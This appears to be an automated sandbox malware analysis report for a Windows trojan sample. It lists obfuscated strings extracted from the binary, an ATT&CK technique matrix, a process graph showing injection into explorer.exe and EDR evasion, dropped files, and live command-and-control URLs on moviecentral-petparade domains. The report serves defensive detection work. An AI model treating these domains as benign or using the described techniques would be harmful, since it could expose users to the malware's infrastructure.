7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          Source: djivmxg.2.drString found in binary or memory: net start termservice
          Source: djivmxg.2.drString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setfae622981b45c94a11d1e551bdee1214f5a43204a66445ad0e09c0db80eb910b153632004d7d6de3766cb72a9a1dc6402e31acgWcX2NTgPXYUekysBNEbhBv8dpJoPJVcg24=Q2g02eXnPnJXOw2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKyn32coQ2g02eXnPnJXPA2p2cUbiwZmbKE=gWcX2NTgPXYUekysBNEbhBv8dpJoPKCn32coQzld2TnhK3KgciGlBSok3APUMqFs3r==SS8rDn==Zy4g3ySqOS5n5H==QSZn5H==3T3eEaK2DUxrPO==W3lV5OTqBnOY1O==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyJTVc4Q==Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8MOLi3juNcEOs2sEwfWra00NDZ3Vc4ePY3B==ZmZo325fzt7AyGCHTCeSysbpPXy7Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3VqZyhnZpQxvpCABaZHNqQUHe2YF=Z0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3R8HUTv3nOofDSl3dQffWZ3S0lA2xZr4XN8LTfi2HpaTk2sPwYogq==OVZOIMHNKl2AUSqFzG==2EJr4r==ZEcOMr==W0ZPfWU1inQ1h2U1g3Q13mo13XM1hGQ1iW814G413X21gH21g2g1hj4=33NgQt3h2Hq200qp3s8afArY33NgQt3h2Hp=32Bk4t3h2Hp=4DI=4TI=4TM=4TQ=YWJk38==fHVV4umsBx==fHVV4yK3Bz1=4Xlg4GBn325fhHQsgXRkjmprQ3JW2NTXUGQ+UGU+Q1Fn5Nbm2oFpPywmNw==kA==OnZp2OO6UQ==h2lg3xuwCjYedEp=f2Zt3dTpCABo1EqsW2ZVKdDX1YSfW1ez4wYjWQZccz==ZHNqQUHe2VKbfEycVV3wLSOdK32gfF7h3cX=VX3k4dC=X2Ju4xTv33mZKCqhO7==WVRAMr==ZGJpQxCdK3OdfVCp4xn=WGce5x7vyG7f0e==VV3CRz2rMx7XOXqN1UG13coQiK==VmpVQxTjPXYe1VB=Ymct5x7rZ2cr2x7wV2co3TPs02ppIxTjPXYe1VB=RDItDqOYDk6YQO==hmM=i2M=V2cp5xTr4DUOgVulE9EjhQrQb0Fl3eGo4mct3JZhOYKbQwui2TYk3AzofW4xBJQmQS4oCJYqIQty3T3XPXYUNSKp3TElgWfQbZcyE rfg3NoCNPe4Hx1KEYh2MXZMgL8eJImEprffWBg3dDqPUTcNg4FHT7r4HOofAUU5NEbScv8dKFw1NDaiGpq3 7sO4KffAUz4xMb2QUDDj4OIQsoCJYqBTT=QS4It8==U3Re4aYuQmtrQn==V2cp5xTr4DUOgVulE9E8gBvibZRl4xbogicZCOb04zUgd1CtBNYofAPkZ5coPNG=Z1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7S02t3xYQ3RDEZZ5pNvDogXFW5xTvJnyn1O==V2co4yTXPYCI0UUl3WNeQxTjP3ajckms2M8lgBzod6V54e4XjXsrDKGwDENWPx 5BLa=QXZp2NLsPHNnZ1pOMvTKNFGVelCl2dUtfWZQdpcwKTLT2ERq3ePv23q7XUYp4wYaZgfa0ZcgGRZH0FNKKwvTIVKzVZp=Z1pOMvTKNFGpdlKy2SAJ3RKmNGJgKTLrimpeQOL GnytcUGE1NQmfAzVYI3tPxLo0mpfQN7GHB==2DErDuy=WGZhPOTp4GGffFKp2cgpPfbI00Rz2yLTfWcpWGZhPOTp4GGffFKp2cgpPffI00Rz2yLTfWcpZ0cBMwbyKlO7VUej3cbpfWTQYIht2dHoi3QbKcP G4OsekOu4v2bghHfc58=ZHNqQyTg4FYbdUN=RjEsFH==RjEtD8==RjEsE8==RjEtEH==V3Zt4dTr4FCVcUqk2A==Tjs1hnZpQxvpCABo1ValQ2wbNnVc4Tro1XqmKA2mysbffMu9NiEhA zX1XUfd1O0ytH7NcS70JZwyr==Oi2bIOfm4DB=NiEhA zvPXXaNC2hzr==ZGcYQOHw1HOmdAYl5wX=QWZZQNLY4Hepdluv2wo iMvo0Z5z4xLsfWhpQNOdBVSjdENgy7==Ng==h2lW5xPs43XaNVFgBNT7Qu==h3U44n==hmJpQx7qX2Z0Pd7e3nJaVEy52TYQ1zvo0ZBzONG=RDErDuyXCUd=RDErDuyXCkB=RDErDuyXCkF=RDErDuyXC3R=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSC
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          2
          Scheduled Task/Job
          512
          Process Injection
          21
          Masquerading
          OS Credential Dumping2
          System Time Discovery
          1
          Remote Desktop Protocol
          1
          Screen Capture
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Scheduled Task/Job
          11
          DLL Side-Loading
          2
          Scheduled Task/Job
          21
          Virtualization/Sandbox Evasion
          LSASS Memory131
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Abuse Elevation Control Mechanism
          512
          Process Injection
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          NTDS21
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture2
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Abuse Elevation Control Mechanism
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information
          Cached Domain Credentials1
          Account Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
          DLL Side-Loading
          DCSync1
          System Owner/User Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
          File and Directory Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow144
          System Information Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546122 Sample: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 43 moviecentral-petparade.com 2->43 45 moviecentral-petparade3.com 2->45 47 moviecentral-petparade2.com 2->47 61 Suricata IDS alerts for network traffic 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 Contains functionality to start a terminal service 2->65 67 2 other signatures 2->67 8 BGUO31BLG4WQAOX9MA4VF71OJ1M.exe 8 2->8         started        11 QTAgent_40.exe 8 2->11         started        13 QTAgent_40.exe 8 2->13         started        signatures3 process4 signatures5 69 Maps a DLL or memory area into another process 8->69 71 Switches to a custom stack to bypass stack traces 8->71 73 Found direct / indirect Syscall (likely to bypass EDR) 8->73 15 comp.exe 4 8->15         started        19 comp.exe 2 11->19         started        21 comp.exe 2 13->21         started        process6 file7 37 C:\Users\user\AppData\Local\Temp\djivmxg, PE32 15->37 dropped 51 Contains functionality to start a terminal service 15->51 53 Injects code into the Windows Explorer (explorer.exe) 15->53 55 Writes to foreign memory regions 15->55 59 2 other signatures 15->59 23 explorer.exe 12 15->23         started        27 conhost.exe 15->27         started        39 C:\Users\user\AppData\Local\Temp\cckrnaa, PE32 19->39 dropped 57 Maps a DLL or memory area into another process 19->57 29 explorer.exe 19->29         started        31 conhost.exe 19->31         started        41 C:\Users\user\AppData\Local\...\pbxllkvlhugf, PE32 21->41 dropped 33 explorer.exe 21->33         started        35 conhost.exe 21->35         started        signatures8 process9 dnsIp10 49 moviecentral-petparade.com 172.67.213.173, 49903, 49916, 49930 CLOUDFLARENETUS United States 23->49 75 System process connects to network (likely due to code injection or exploit) 23->75 77 Contains functionality to start a terminal service 23->77 79 Contains functionality to inject code into remote processes 23->79 81 Switches to a custom stack to bypass stack traces 23->81 signatures11

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          BGUO31BLG4WQAOX9MA4VF71OJ1M.exe13%ReversingLabsWin32.Trojan.GiantMidie
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\cckrnaa100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\pbxllkvlhugf100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\djivmxg100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.symauth.com/cps0(0%URL Reputationsafe
          http://www.symauth.com/rpa000%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          moviecentral-petparade.com
          172.67.213.173
          truetrue
            unknown
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalse
              unknown
              moviecentral-petparade2.com
              unknown
              unknownfalse
                unknown
                moviecentral-petparade3.com
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://moviecentral-petparade.com/g9jvjfd73/index.phptrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phppexplorer.exe, 0000000C.00000003.2173311069.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156574293.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpc$vexplorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phps$fexplorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://www.vmware.com/0BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclMath.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                              unknown
                              https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/bzip2.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                unknown
                                https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclStringConverBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                  unknown
                                  http://moviecentral-petparade2.com/g9jvjfd74/index.php8Eexplorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://moviecentral-petparade2.com/g9jvjfd74/index.php/index.phpexplorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://moviecentral-petparade2.com/g9jvjfd74/index.phprDexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php%6explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://moviecentral-petparade.com/g9jvjfd73/index.php6Dexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://moviecentral-petparade.com/g9jvjfd73/index.phpWEexplorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/Jcl8087.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                unknown
                                                http://moviecentral-petparade2.com/g9jvjfd74/index.phpJexplorer.exe, 0000000C.00000003.2156574293.00000000030DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnitVersioniBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                    unknown
                                                    http://moviecentral-petparade2.com/g9jvjfd74/index.phpOexplorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://moviecentral-petparade2.com/g9jvjfd74/index.phpbEexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpc%vexplorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phps%fexplorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://moviecentral-petparade.com/g9jvjfd73/index.phpshqos.dll.muicexplorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclBase.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                unknown
                                                                http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpoviecentral-petparade2.comexplorer.exe, 0000000C.00000002.2601540859.00000000030B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2347011547.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclMime.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                    unknown
                                                                    http://moviecentral-petparade2.com/g9jvjfd74/index.php9Dexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclWideStrings.BGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                        unknown
                                                                        http://moviecentral-petparade2.com/g9jvjfd74/index.phpjexplorer.exe, 0000000C.00000003.2156574293.00000000030DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2173467898.00000000030DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://moviecentral-petparade.com/g9jvjfd73/index.phpEDexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://moviecentral-petparade2.com/g9jvjfd74/index.php)Eexplorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysUtils.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                unknown
                                                                                https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/sevenzip.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                  unknown
                                                                                  https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclLogic.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                    unknown
                                                                                    http://moviecentral-petparade2.com/g9jvjfd74/index.phppjyexplorer.exe, 0000000C.00000003.2251805547.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2173311069.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156574293.00000000030BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclSecurity.paBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                        unknown
                                                                                        http://moviecentral-petparade.com/g9jvjfd73/index.phppjyexplorer.exe, 0000000C.00000003.2347011547.00000000030BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://moviecentral-petparade2.com/g9jvjfd74/index.php6Dexplorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://moviecentral-petparade2.com/g9jvjfd74/index.phpWEexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://moviecentral-petparade2.com/g9jvjfd74/index.phpG4explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/zlibh.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                  unknown
                                                                                                  http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpoviecentral-petparade3.comiexplorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclRTTI.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                      unknown
                                                                                                      http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpgsexplorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://moviecentral-petparade.com/g9jvjfd73/index.php8Eexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://moviecentral-petparade.com/g9jvjfd73/index.phpwshqos.dll.muiexplorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://moviecentral-petparade2.com/g9jvjfd74/index.php?4explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.symauth.com/cps0(BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysInfo.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                unknown
                                                                                                                http://moviecentral-petparade2.com/g9jvjfd74/index.php&Eexplorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclShell.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                    unknown
                                                                                                                    http://moviecentral-petparade2.com/g9jvjfd74/index.phpshqos.dll.muicexplorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://moviecentral-petparade3.com/8bkjdSdfjexplorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclIniFiles.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                          unknown
                                                                                                                          http://www.symauth.com/rpa00BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.info-zip.org/BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006928000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D09000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004DEF000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004429000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F04000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D05000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclResources.paBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                              unknown
                                                                                                                              https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclCompression.BGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                unknown
                                                                                                                                http://moviecentral-petparade.com/g9jvjfd73/index.php&Eexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
